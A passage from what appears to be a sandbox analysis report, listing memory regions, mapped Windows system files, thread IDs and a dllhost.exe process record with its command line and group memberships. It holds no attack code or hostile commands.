entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1304 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1305 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1306 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1307 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1308 start_va = 0x6c0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1309 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1310 start_va = 0x7ffb542d0000 end_va = 0x7ffb54328fff monitored = 0 entry_point = 0x7ffb542dfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1311 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1312 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1313 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1314 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1315 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1316 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1317 start_va = 0xa0000 end_va = 0xa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1318 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1319 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1320 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1321 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1323 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1324 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1325 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1326 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1327 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1328 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 1329 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 1330 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1331 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1332 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1333 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1334 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1335 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1336 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1337 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1338 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1339 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1340 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1341 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1342 start_va = 0x1f60000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1343 start_va = 0x2070000 end_va = 0x23a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1344 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1345 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1346 start_va = 0x1e60000 end_va = 0x1eb9fff monitored = 1 entry_point = 0x1e753f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1347 start_va = 0x1ec0000 end_va = 0x1ee0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1348 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1349 start_va = 0x23b0000 end_va = 0x25c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1350 start_va = 0x25d0000 end_va = 0x27e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 1351 start_va = 0x27f0000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 1352 start_va = 0x2900000 end_va = 0x2b13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1353 start_va = 0x2b20000 end_va = 0x2c2bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Thread: id = 83 os_tid = 0x9f0 Thread: id = 84 os_tid = 0xc24 Thread: id = 85 os_tid = 0xc20 Process: id = "10" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x2bdca000" os_pid = "0x8b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17586 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17587 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 17588 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17589 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 17590 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 17591 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17592 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 17593 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 17594 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 17595 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17596 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17597 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 17598 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17599 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 17600 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 17601 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 17602 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17603 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 17604 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 17605 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17606 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17607 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17608 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17609 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17610 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17611 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17612 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17613 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17614 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17615 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17616 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17617 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17618 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 17619 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17620 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17621 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 17622 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 17623 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 17624 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 17625 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 17626 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 17627 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 17628 start_va = 0x740000 end_va = 0x743fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 17629 start_va = 0x750000 end_va = 0x751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 17630 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 17631 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 17632 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 17633 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17634 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17635 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17636 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17637 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17638 start_va = 0x8d0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17639 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17640 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17641 start_va = 0x900000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17642 start_va = 0x910000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17643 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17644 start_va = 0x930000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 17645 start_va = 0x940000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 17646 start_va = 0x950000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17647 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17648 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17649 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17650 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17651 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17652 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17653 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17654 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = 